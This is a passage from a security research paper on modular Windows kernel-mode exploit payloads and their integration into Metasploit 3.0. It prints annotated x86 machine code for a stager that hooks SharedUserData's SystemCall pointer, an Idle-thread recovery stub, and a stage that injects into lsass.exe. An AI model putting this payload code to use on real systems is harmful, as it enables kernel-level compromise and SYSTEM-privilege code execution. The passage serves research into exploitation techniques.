|
Payload Architecture
The payload architecture that the authors decided to integrate was based
heavily off previous research[1]. As was alluded to in the
introduction, there are a number of complicated considerations that must be
taken into account when dealing with kernel-mode exploitation. A large
majority of these considerations are directly related to what methods should be
used when executing arbitrary code in the kernel. For example, if a device
driver was holding a lock at the time that an exploit was triggered, what
might be the best way to go about releasing that lock so as to recover the
system so that it will still be possible to interact with it in a meaningful
way? Other types of considerations include things like IRQL restrictions,
cleaning up corrupted structures, and so on. These considerations lead to
there being many different ways in which a payload might best be implemented
for a particular vulnerability. This is quite a bit different from the
user-mode environment where it's almost always possible to use the exact same
payload regardless of the application.
Though these situational complications do exist, it is possible to design and
implement a payload system that can be applied in almost any circumstance. By
separating kernel-mode payloads into variable components, it becomes possible
to combine components together in different ways to form functional variations
that are best suited for particular situations. In Windows
Kernel-mode Payload Fundamentals [1], kernel-mode payloads are
broken down into four different components: migration, stagers, recovery, and
stages.
When describing kernel-mode payloads in terms of components, the
migration component would be one that is used to migrate from an
unsafe execution environment to a safe execution environment. For example, if
the IRQL is at DISPATCH when a vulnerability is triggered, it may be necessary
to migrate to a safer IRQL such as PASSIVE. It is not always necessary to
have a migration component. The purpose of a stager component is to
move some portion of the payload so that it executes in the context of another
thread context. This may be necessary if the current thread is of critical
importance or may lead to a deadlock of the system should certain operations
be used. The use of a stager may obviate the need for a migration component.
A recovery component is something that is used to restore the system
to clean state and then continue execution. This component is generally one
that may require customization for a given vulnerability as it may not always
be possible to describe the steps needed to recover the system in a generic way.
For example, if locks were held at the time that the vulnerability was
triggered, it may be necessary to find a way to release those locks and then
continue execution from a safe point. Finally, the stage component
is a catch-all for whatever arbitrary code may be executed once the payload is
running in a safe environment.
This model for describing kernel-mode payloads is what the authors decided to
adopt. To better understand how this model works, it seems best to describe
how it was applied for all three real world vulnerabilities that are shown in
chapter 5. These three vulnerabilities actually make use of the same
basic underlying payload, which will henceforth be referred to as ``the
payload'' for brevity. The payload itself is composed of three of the four
components. Each of the payload components will be discussed individually and
then as a whole to provide an idea for how the payload operates.
The first component that exists in the payload is a stager component. The
stager that the authors chose to use is based on the SharedUserData
SystemCall Hook stager described in [1]. Before understanding
how the stager works, it's important to understand a few things. As the name
implies, the stager accomplishes its goal by hooking the SystemCall
attribute found within SharedUserData. As a point of reference,
SharedUserData is a global page that is shared between user-mode and
kernel-mode. It acts as a sort of global structure that contains things like
tick count and time information, version information, and quite a few other
things. It's extremely useful for a few different reasons, not the least of
which being that it's located at a fixed address in user-mode and in
kernel-mode on all NT derivatives. This means that the stager is instantly
portable and doesn't need to perform any symbol resolution to locate the
address, thus helping to keep the overall size of the payload small.
The SystemCall attribute that is hooked is part of an enhancement
that was added in Windows XP. This enhancement was designed to make it
possible to use optimized system call instructions depending on what hardware
support is present on a given machine. Prior to Windows XP, system calls were
dispatched from user-mode through the hardcoded use of the int 0x2e
soft interrupt. Over time, hardware enhancements were made to decrease the
overhead involved in performing a system call, such as through the
introduction of the sysenter instruction. Since Microsoft isn't in
the business of providing different versions of Windows for different makes
and models of hardware, they decided to determine at runtime which system call
interface to use. SharedUserData was the perfect candidate for
storing the results of this runtime determination as it was already a shared
page that existed in every user-mode process. After making these
modifications, ntdll.dll was updated to dispatch system calls
through SharedUserData rather than through the hardcoded use of
int 0x2e. The initial implementation of this new system call
dispatching interface placed executable code within the SystemCall
attribute of SharedUserData. Subsequent versions of Windows, such as
XP SP2, turned the SystemCall attribute into a function pointer.
One important implication about the introduction of the SystemCall
attribute to SharedUserData is that it represents a pivot point
through which all system call dispatching occurs in user-mode. In previous
versions of Windows, each user-mode system call stub routine invoked
int 0x2e directly. In the latest versions, these stub routines make
indirect calls through the SystemCall function pointer. By default,
this function pointer is initialized to point to one of a few exported symbols
within ntdll.dll. However, the implications of this function pointer
being changed to point elsewhere mean that it would be possible to intercept
all system calls within all processes. This implication is what forms the
very foundation for the stager that is used by the payload.
When the stager begins executing, it's running in kernel-mode in the context of
the thread that triggered the vulnerability. The first action it takes is to
copy a chunk of code (the stage) into an unused portion of
SharedUserData using the predictable address of 0xffdf037c.
After the copy operation completes, the stager proceeds by hooking the
SystemCall attribute. This hook must be handled differently
depending on whether or not the target operating system is pre-XP SP2 or not.
More details on how this can be handled are described in [1].
Regardless of the approach, the SystemCall attribute is redirected to
point to 0x7ffe037c. This predictable location is the user-mode
accessible address of the unused portion of SharedUserData where the
stage was copied into. After the hooking operation completes, all system calls
invoked by user-mode processes will first go through the stage placed at
0x7ffe037c. The stager portion of the payload looks something like
this4.1:
; Jump/Call to get the address of the stage
00000000 EB38 jmp short 0x3a
00000002 BB0103DFFF mov ebx,0xffdf0301
00000007 4B dec ebx
00000008 FC cld
; Copy the stage into 0xffdf037c
00000009 8D7B7C lea edi,[ebx+0x7c]
0000000C 5E pop esi
0000000D 6AXX push byte num_stage_dwords
0000000F 59 pop ecx
00000010 F3A5 rep movsd
; Set edi to the address of the soon-to-be function pointer
00000012 BF7C03FE7F mov edi,0x7ffe037c
; Check to make sure the hook hasn't already been installed
00000017 393B cmp [ebx],edi
00000019 7409 jz 0x24
; Grab SystemCall function pointer
0000001B 8B03 mov eax,[ebx]
0000001D 8D4B08 lea ecx,[ebx+0x8]
; Store the existing value in 0x7ffe0308
00000020 8901 mov [ecx],eax
; Overwrite the existing function pointer and make things live!
00000022 893B mov [ebx],edi
; recovery stub here
0000003A E8C3FFFFFF call 0x2
; stage here
With the hook in place, the stager has completed its primary task which was to
copy a stage into a location where it could be executed in the future. Before
the stage can execute, the stager must allow the recovery component of the
payload to execute. As mentioned previously, the recovery component
represents one of the most vulnerability-specific portions of any kernel-mode
payload. For the purpose of the exploits described in chapter 5, a
special purpose recovery component was necessary.
This particular recovery component was required due to the fact that the
example vulnerabilities are triggered in the context of the Idle
thread. On Windows, the Idle thread is a special kernel thread that
executes whenever a processor is idle. Due to the nature of the way the
Idle thread operates, it's dangerous to perform operations like
spinning the thread or any of the other recovery methods described in
[1]. It may also be possible to apply the technique for
delaying execution within the Idle thread as discussed in
[2]. The recovery method that was finally selected involves two basic
steps. First, the IRQL for the current processor is restored to DISPATCH
level just in case it was executing at a higher IRQL. Second, execution
control is transferred into the first instruction of nt!KiIdleLoop
after initializing registers appropriately. The end effect is that the idle
thread begins executing all over again and, if all goes well, the system
continues operating as if nothing had happened. In practice, this recovery
method has been proven reliable. However, the one negative that it is has is
that it requires knowledge of the address that nt!KiIdleLoop resides
at. This dependence represents an area that is ripe for future improvement.
Regardless of limitations, the recovery component for the payload looks like
the code below:
; Restore the IRQL
00000024 31C0 xor eax,eax
00000026 64C6402402 mov byte [fs:eax+0x24],0x2
; Initialize assumed registers
0000002B 8B1D1CF0DFFF mov ebx,[0xffdff01c]
00000031 B827BB4D80 mov eax,0x804dbb27
00000036 6A00 push byte +0x0
; Transfer control to nt!KiIdleLoop
00000038 FFE0 jmp eax
After the recovery component has completed its execution, all of the payload
code that was originally executing in kernel-mode is complete. The final
portion of the payload that remains to be executed is the stage that was
copied by the stager. The stage itself runs in user-mode within all process
contexts, and it executes every time a system call is dispatched. The
implications of this should be obvious. Having a stage that executes within
every process every time a system call occurs is just asking for trouble. For
that reason, it makes sense to design a generic user-mode stage that can be
used to limit the times that it executes to one particular context.
The approach that the authors took to meet this requirement is as follows.
First, the stage performs a check that is designed to see if it is running in
the context of a specific process. This check is there in order to help
ensure that the stage itself only executes in a known-good environment. As an
example, it would be a shame to take advantage of a kernel-mode vulnerability
only to finally execute code with the privileges of Guest. By default, this
check is designed to see if the stage is running within lsass.exe, a
process that runs with SYSTEM level privileges. If the stage is
running within lsass, it performs a check to see if the
SpareBool attribute of the Process Environment Block has
been set to one. By default, this value is initialized to zero in all
processes. If the SpareBool attribute is set to zero, then the stage
proceeds to set the SpareBool attribute to one and then finishes by
executing whatever code is remaining within the stage. If the
SpareBool attribute is set to one, which means the stage has already
run, or it's not running within lsass, it transfers control back to the
original system call dispatching routine. This is necessary because it is
still a requirement that system calls from user-mode processes be dispatched
appropriately, otherwise the system itself would grind to a halt. An example
of what this stage might look like is shown below:
; Preserve the calling environment
0000003F 60 pusha
00000040 6A30 push byte +0x30
00000042 58 pop eax
00000043 99 cdq
00000044 648B18 mov ebx,[fs:eax]
; Check if Peb->Ldr is NULL
00000047 39530C cmp [ebx+0xc],edx
0000004A 7426 jz 0x72
; Extract Peb->ProcessParameters->ImagePathName.Buffer
0000004C 8B5B10 mov ebx,[ebx+0x10]
0000004F 8B5B3C mov ebx,[ebx+0x3c]
; Add 0x28 to the image path name (skip past c:\windows\system32\)
00000052 83C328 add ebx,byte +0x28
; Compare the name of the executable with lass
00000055 8B0B mov ecx,[ebx]
00000057 034B03 add ecx,[ebx+0x3]
0000005A 81F96C617373 cmp ecx,0x7373616c
; If it doesn't match, execute the original system call dispatcher
00000060 7510 jnz 0x72
00000062 648B18 mov ebx,[fs:eax]
00000065 43 inc ebx
00000066 43 inc ebx
00000067 43 inc ebx
; Check if Peb->SpareBool is 1, if it is, execute the original
; system call dispatcher
00000068 803B01 cmp byte [ebx],0x1
0000006B 7405 jz 0x72
; Set Peb->SpareBool to 1
0000006D C60301 mov byte [ebx],0x1
; Jump into the continuation stage
00000070 EB07 jmp short 0x79
; Restore the calling environment and execute the original system call
; dispatcher that was preserved in 0x7ffe0308
00000072 61 popa
00000073 FF250803FE7F jmp near [0x7ffe0308]
; continuation of the stage
The culmination of these three payload components is a functional payload that
can be used in any situation where an exploit is triggered within the
Idle thread. If the exploit is triggered outside of the context of
the Idle thread, the recovery component can be swapped out with an
alternative method and the rest of the payload can remain unchanged. This is
one of the benefits of breaking kernel-mode payloads down into different
components. To recap, the payload works by using a stager to copy a stage
into an unused portion of SharedUserData. The stager then points the
SystemCall attribute to that unused portion, effectively causing all
user-mode processes to bounce through the stage when they attempt to make a
system call. Once the stager has completed, the recovery component restores
the IRQL to DISPATCH and then restarts the Idle thread. The
kernel-mode portion of the payload is then complete. Shortly after that, the
stage that was copied to SharedUserData is executed in the context of
a specific user-mode process, such as lsass.exe. Once this occurs,
the stage sets a flag that indicates that it's been executed and completes.
All told, the payload itself is only 115 bytes, excluding any additional code
in the stage.
Given all of this infrastructure work, it's trivial to plug almost any
user-mode payload into the stage. The additional code must simply be placed
at the point where it's verified that it's running in a particular process and
that it hasn't been executed before. The reason for it being so trivial was
quite intentional. One of the major goals in implementing this payload system
was to make it possible to use the existing set of payloads that exist in the
Metasploit framework in conjunction with any kernel-mode exploit. This
includes even some of the more powerful payloads such as Meterpreter and VNC
injection.
There were two key elements involved in integrating kernel-mode payloads into
the 3.0 version of the Metasploit Framework. The first had to do with
defining the interface that exploit developers would need to use when writing
kernel-mode exploits. The second delt with defining the interface the
end-users would have to be aware of when using kernel-mode exploits. In terms
of precedence, defining the programming level interfaces first is the ideal
approach. To that point, the programming interface that was decided upon is
one that should be pretty easy to use. The majority of the complexity
involved in selecting a kernel-mode payload is hidden from the developer.
There are only a few basic things that the developer needs to be aware of.
When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to
include the Msf::Exploit::KernelMode mixin. This mixin provides
hints to the framework that make it aware of the fact that any payloads used
with this exploit will need to be appropriately encapsulated within a
kernel-mode stager. With this simple action, the majority of the work
associated with the kernel-mode payload is abstracted away from the developer.
The only other elements that a developer may need to deal with is the process
of defining extended parameters that are used to further control the process
of selecting different aspects of the kernel-mode payload. These controlable
parameters are exposed to developers through the ExtendedOptions hash
element in an exploit's global or target-specific Payload options.
An example of what this might look like within an exploit can be seen here:
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
In the above example, the exploit has explicitly selected the underlying
stager component that should be used by specifying the Stager hash
element. The sud_syscall_hook stager is a symbolic name for the
stager that was described in section 4.1. The example above
also has the exploit explicitly selecting the recovery component that should
be used. In this case, the recovery component that is selected is
idlethread_restart which is a symbolic name for the recovery
component described previously. Additionally, the nt!KiIdleLoop
address is specified for use with this particular recovery component.
Under the hood, the use of the KernelMode mixin and the additional
extended options results in the framework encapsulating whatever user-mode
payload the end-user specified inside of a kernel-mode stager. In the end,
this process is entirely transparent to both the developer and the end-user.
While the set of options that can be specified in the extended options hash
will surely grow in the future, it makes sense to at least document the set of
defined elements at the time of this writing. These options are described in
the following table:
Hash Element | Description |
Recovery | Defines the recovery component that should be used when
generating the kernel-mode payload. The current set of valid values for this
option include spin, which will spin the current thread,
idlethread_restart, which will restart the Idle thread, or
default which is equivalent to spin. Over time, more
recovery methods may be added. These can be found in recovery.rb. |
RecoveryStub | Defines a custom recovery component. |
Stager | Defines the stager component that should be used when
generating the kernel-mode payload. The current set of valid values for this
option include sud_syscall_hook. Over time, more stager methods
may be added. These can be found in stager.rb. |
UserModeStub | Defines the user-mode custom code that should be
executed as part of the stage. |
RunInWin32Process | Currently only applicable to the
sud_syscall_hook stager. This element specifies the name of the
system process, such as lsass.exe, that should be injected into. |
KiIdleLoopAddress | Currently only applicable to the
idlethread_restart recovery component. This element specifies the
address of nt!KiIdleLoop. |
| |
While not particularly important to developers or end-users, it may be
interesting for some to understand how this abstraction works internally. To
start things off, the KernelMode mixin overrides a base class method
called encode_begin. This method is called when a payload that is
used by an exploit is being encoded. When this happens, the mixin declares a
procedure that is called by the payload encoder. In turn, this procedure
is called by the payload encoder in the context of encapsulating the
pre-encoded payload. The procedure itself is passed the original raw
user-mode payload and the payload options hash (which contains the extended
options, if any, that were specified in the exploit). It uses this
information to construct the kernel-mode stager that is used to encapsulate
the user-mode payload. If the procedure completes successfully, it returns a
non-nil buffer that contains the original user-mode payload encapsulated
within a kernel-mode stager. The kernel-mode stager and other components are
actually contained within the payloads subsystem of the Rex library
under lib/rex/payloads/win32/kernel.
|